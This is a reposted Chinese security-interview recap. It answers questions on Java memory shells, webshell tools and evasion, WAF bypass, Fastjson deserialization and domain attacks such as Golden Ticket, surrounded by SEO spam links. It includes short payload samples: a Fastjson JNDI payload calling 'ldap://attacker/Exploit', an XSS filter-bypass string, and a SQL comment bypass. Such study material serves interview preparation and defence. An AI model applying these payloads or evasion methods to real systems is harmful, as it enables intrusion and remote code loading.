当前位置: 首页 > wzjs >正文

教育培训机构怎么建设网站2k屏幕的网站怎么做

教育培训机构怎么建设网站,2k屏幕的网站怎么做,软件外包平台哪家可信赖,芜湖网站建设开发网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 某四字大厂面试复盘 一面 1. Java内存马的原理和利用 2. 冰蝎与哥斯拉原理 3. 绕WAF实战经验 4. Web…

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 某四字大厂面试复盘 一面

1. Java内存马的原理和利用

2. 冰蝎与哥斯拉原理

3. 绕WAF实战经验

4. Webshell免杀原理

5. CS与MSFvenom结合免杀

6. Fastjson反序列化

7. 红黑树与HashMap原理

8. 内网渗透与域控实战

9. SQLMap原理

10. MySQL B+树优势

11. PHP与Golang安全问题


 

 某四字大厂面试复盘 一面

java内存马的原理和利用
如何查杀javan内存马,分别从工具和原理角度说说
冰蝎和哥斯拉了解吗,讲讲原理
有绕waf的实战经验吗,从各种漏洞的角度讲下
熟悉webshell免杀吗,讲下原理
做过其他免杀吗,比如结合cs和msfvenom的
谈谈fastjson反序列化原理和常见利用链吧
红黑树原理
hashmap原理
内网渗透、域控相关的实战经验
java反序列化cc链实战原理
sqlmap原理
Mysql为什么要用b+树
linux内核的漏洞
python的沙箱逃逸
python的flask模板注入
抽象语法树
rasp的概念和原理
rasp的对抗
php和golang语法本身的安全问题
1. Java内存马的原理和利用
  • 原理

    • 内存马是一种驻留内存的恶意组件,通过动态注册Servlet/Filter/Listener等组件实现持久化。常见类型包括:
      1. Filter型内存马:利用javax.servlet.Filter 接口动态注册恶意过滤器,拦截请求执行命令。
      2. Servlet型内存马:通过ServletContext.addServlet() 注入恶意Servlet。
      3. Listener型内存马:注册恶意监听器(如ServletRequestListener)在请求到达时触发。
    • 利用链:通常通过反序列化漏洞或框架特性(如Spring的Controller参数绑定)注入。
  • 查杀方法

    • 工具
      • Arthas/JProfiler:分析JVM内存中的类加载情况,定位可疑类。
      • Java-memory-shell-scanner:扫描Tomcat的StandardContext中的动态注册组件。
    • 原理
      • 动态类检测:监控ClassLoader加载的类,识别非标准类路径的恶意类。
      • 组件链分析:检查web.xml 与内存中组件的差异,如未注册的Filter/Servlet。

2. 冰蝎与哥斯拉原理
  • 冰蝎
    • 通信加密:动态密钥AES加密请求/响应,密钥通过首次请求的MD5哈希生成。
    • 流量特征:HTTP Body为Base64编码的加密数据,Header中无固定特征。
  • 哥斯拉
    • 多协议支持:支持HTTP、HTTPS、DNS隧道,流量可伪装为正常业务。
    • 载荷混淆:通过异或加密和随机参数名绕过WAF检测。

3. 绕WAF实战经验
  • SQL注入
    • 分块传输:利用HTTP分块编码绕过正则匹配。
    • 内联注释:如/*!50000select*/绕过黑名单。
  • XSS
    • HTML实体编码:如<img src=x onerror=alert(1)>转为<img src=x &#x6F;nerror=alert(1)>
  • 文件上传
    • 扩展名混淆:如.php5.phtml绕过后缀过滤。
    • Content-Type绕过:伪造为image/jpeg

4. Webshell免杀原理
  • 代码混淆
    • 反射调用:如Class.forName("java.lang.Runtime").getMethod("exec")
    • 加密加载:使用AES加密Shell代码,运行时解密执行。
  • 框架伪装
    • Spring Interceptor:注册恶意拦截器,伪装为业务组件。
    • JSP EL表达式:如${pageContext.request.getParameter("cmd")}

5. CS与MSFvenom结合免杀
  • Staged Payload分离:生成无特征的Stager,通过DNS或HTTP分段加载Shellcode。
  • 进程注入
    • 使用MSF生成Raw格式的Shellcode,通过Cobalt Strike的execute-assembly注入到合法进程(如explorer.exe )。
  • 内存加密:通过AES-CBC加密Shellcode,加载时动态解密。

6. Fastjson反序列化
  • 原理:利用@type指定恶意类触发Getter/Setter链,如:json

    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker/Exploit"}

  • 利用链
    1. JNDI注入链(JdbcRowSetImpl)。
    2. TemplatesImpl链:通过_bytecodes字段加载字节码。
  • 防御:升级至Fastjson 1.2.68+并开启SafeMode

7. 红黑树与HashMap原理
  • 红黑树
    • 平衡规则
      1. 节点为红或黑。
      2. 根和叶子(NIL)为黑。
      3. 红节点的子节点必须为黑。
      4. 任意路径黑节点数相同。
    • 操作代价:插入/删除后通过旋转(左旋/右旋)和变色维持平衡。
  • HashMap
    • 结构:数组+链表/红黑树(JDK8+)。
    • 哈希冲突:拉链法处理碰撞,链表长度>8时树化。
    • 扩容机制:负载因子默认0.75,容量翻倍重新哈希。

8. 内网渗透与域控实战
  • 横向移动
    • Pass-the-Hash:利用Mimikatz获取NTLM哈希,通过SMB协议横向。
    • MS17-010:利用永恒之蓝漏洞攻击未修补主机。
  • 域控攻击
    • DCSync:模拟域控制器同步用户哈希。
    • Golden Ticket:伪造Kerberos TGT票据获取域管理员权限。

9. SQLMap原理
  • 注入检测
    • 布尔盲注:通过页面响应差异判断条件真假。
    • 时间盲注:利用SLEEP()函数检测延迟。
  • 数据提取
    • UNION查询:通过联合查询获取数据。
    • OOB通道:利用DNS/HTTP外带数据。

10. MySQL B+树优势
  • 结构特性
    • 叶子节点链表:支持高效范围查询(如WHERE id BETWEEN 10 AND 20)。
    • 高扇出:非叶子节点仅存储键,减少磁盘I/O次数。
  • 对比B树:B+树所有数据存储在叶子节点,查询稳定性更高。

11. PHP与Golang安全问题
  • PHP
    • 弱类型:如"0e123456" == "0"返回true
    • 反序列化漏洞:如__wakeup()__destruct()中的代码执行。
  • Golang
    • 接口误用:如空接口interface{}类型断言失败导致Panic。
    • 依赖漏洞:第三方库未校验输入导致RCE(如旧版go-yaml)。


文章转载自:

http://uJfdZpMb.jrhcp.cn
http://Az3TOYi4.jrhcp.cn
http://L3yaakJI.jrhcp.cn
http://aidfsPfV.jrhcp.cn
http://T44egbiZ.jrhcp.cn
http://UQ2OIMm6.jrhcp.cn
http://fi0PLNG8.jrhcp.cn
http://0WDgAZsG.jrhcp.cn
http://ZiiajfyG.jrhcp.cn
http://Fp91rz5G.jrhcp.cn
http://14hM26kU.jrhcp.cn
http://xJ95tUMk.jrhcp.cn
http://g8NcH8EI.jrhcp.cn
http://8Va6Bbgg.jrhcp.cn
http://6OjLaSey.jrhcp.cn
http://gZ1MLDGF.jrhcp.cn
http://2XyNOuvq.jrhcp.cn
http://0t352ku3.jrhcp.cn
http://DgMon3lv.jrhcp.cn
http://LeTqv2bS.jrhcp.cn
http://NZHEP0m6.jrhcp.cn
http://AshCArqK.jrhcp.cn
http://BxWwyZvU.jrhcp.cn
http://O3sTeGgf.jrhcp.cn
http://Woqby3Yk.jrhcp.cn
http://0kc5IaI5.jrhcp.cn
http://PRR7DlnV.jrhcp.cn
http://ZofObMH6.jrhcp.cn
http://qNX1ukRO.jrhcp.cn
http://fVbv4SfD.jrhcp.cn
http://www.dtcms.com/wzjs/760591.html

相关文章:

  • 怎么把自己电脑建设网站优质视频素材网站
  • wordpress 选择用户东莞网站建设白帽seo
  • 网站开发有前景吗广州冼村地铁站几号线
  • 网站发布平台做化工类网站内容
  • 可以做软文推广的网站专业开发网站建设
  • 做网站的产品图片做h5网站
  • 前台网站开发技术seo搜索引擎优化是利用
  • 做一个网站需要多少钱 怎么做seo如何优化网站步骤
  • 魔力百科网站做料理视频汕头网站关键词优化教程
  • 网站建设标准合同wordpress端口更改
  • 单页销售网站如何赚钱网页设计模板素材旅游
  • 系统网站怎么做的wordpress技术博客模板
  • 自学网站推荐上海网站高端
  • 玉树网站建设在线设计平台属于什么行业
  • 怎样创建网站发招聘信息教育培训加盟
  • vr看房网站开发费用微信小程序注册方式
  • 深圳手机网站建设报价网站建设与推广协议书
  • 帝国cms做淘宝客网站网站如何做关键词
  • 东台市住房和城乡建设局网站产品关键词的搜索渠道
  • 电子商务网站的建设与规划书江油市规划和建设局网站
  • 网站建设与运营合同投稿网站
  • 大连网站建设短期培训班新能源汽车车型
  • 安徽房产网站建设洞口网站开发公司推荐
  • 泉州网站建设推广怎么选择赣州网站建设
  • 赤壁市药监局网站建设方案如何给自己建设的网站设置登陆用户名和密码
  • 娄底北京网站建设做任务提现的网站
  • wordpress编辑文章怎么设置成中文济南优化网站关键词
  • 装修设计图网站厦门做企业网站的公司
  • 怎么查网站的域名备案价格北京做网站那家好
  • 做介绍翻译英文网站排名app